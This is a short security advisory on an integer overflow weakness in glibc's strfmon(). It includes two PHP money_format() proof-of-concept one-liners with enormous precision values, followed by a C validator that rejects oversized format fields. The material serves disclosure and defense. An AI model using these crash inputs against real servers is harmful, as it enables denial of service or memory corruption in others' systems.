GNU glibc 'strfmon()' Function Integer Overflow Weakness

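The following proof-of-concept commands are available. They reach strfmon() through PHP's money_format(), which passes the format string to the C library function: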

php -r 'money_format("%.1073741821i",1);'
php -r 'money_format("%.1343741821i",1);'
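
A caller-side check that rejects oversized numeric fields before a format string reaches strfmon(), as an added example that is not part of the original advisory or of glibc. The names strfmon_format_ok, bounded_number and bounded_precision and the MAX_FIELD limit are assumptions; the grammar checked is the strfmon() form %[flags][width][#left][.right] followed by i or n.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_FIELD 64 /* assumed policy limit, not a glibc constant */

/* Consume a digit run at *p; return -1 once the value exceeds MAX_FIELD. */
static int bounded_number(const char **p) {
    int v = 0;
    for (; isdigit((unsigned char)**p); (*p)++) {
        v = v * 10 + (**p - '0');
        if (v > MAX_FIELD) return -1;   /* stop long before int can wrap */
    }
    return v;
}

/* After a '#' or '.' marker, require at least one digit and a bounded value. */
static int bounded_precision(const char **p) {
    (*p)++;
    return isdigit((unsigned char)**p) && bounded_number(p) >= 0;
}

/* Return 1 if every conversion in fmt is well-formed and bounded, else 0. */
int strfmon_format_ok(const char *fmt) {
    const char *p = fmt;
    while ((p = strchr(p, '%')) != NULL) {
        if (*++p == '%') { p++; continue; }                /* literal "%%" */
        for (;;) {                                         /* flags: =f ^ + ( ! - */
            if (*p == '=' && p[1] != '\0') p += 2;
            else if (*p != '\0' && strchr("^+(!-", *p)) p++;
            else break;
        }
        if (bounded_number(&p) < 0) return 0;              /* field width */
        if (*p == '#' && !bounded_precision(&p)) return 0; /* left precision */
        if (*p == '.' && !bounded_precision(&p)) return 0; /* right precision */
        if (*p != 'i' && *p != 'n') return 0;              /* conversion */
        p++;
    }
    return 1;
}

int main(void) {
    /* First two formats are from the page; the third is constructed. */
    const char *samples[] = { "%.1073741821i", "%.1343741821i", "%=*#6.2n" };
    for (size_t i = 0; i < 3; i++)
        printf("%-16s %s\n", samples[i], strfmon_format_ok(samples[i]) ? "accept" : "reject");
    return 0;
}
```
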


 

Copyright 2010, SecurityFocus